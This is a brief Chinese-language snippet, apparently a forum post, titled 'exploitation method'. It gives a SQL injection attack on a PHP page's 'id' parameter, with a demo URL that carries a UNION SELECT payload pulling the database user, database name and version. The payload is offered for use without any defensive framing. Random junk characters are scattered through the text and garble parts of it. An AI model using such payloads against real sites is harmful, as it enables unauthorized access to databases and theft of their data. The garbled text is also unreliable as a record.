利用方法:
8 V6 p8 ]6 R5 E0 O9 N http://www.xxx.com/index.php?id=[SQL]4 f/ m9 T; c4 |0 I9 `: G- y! ^
Demo:1 g# L/ U; \; ~# J
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |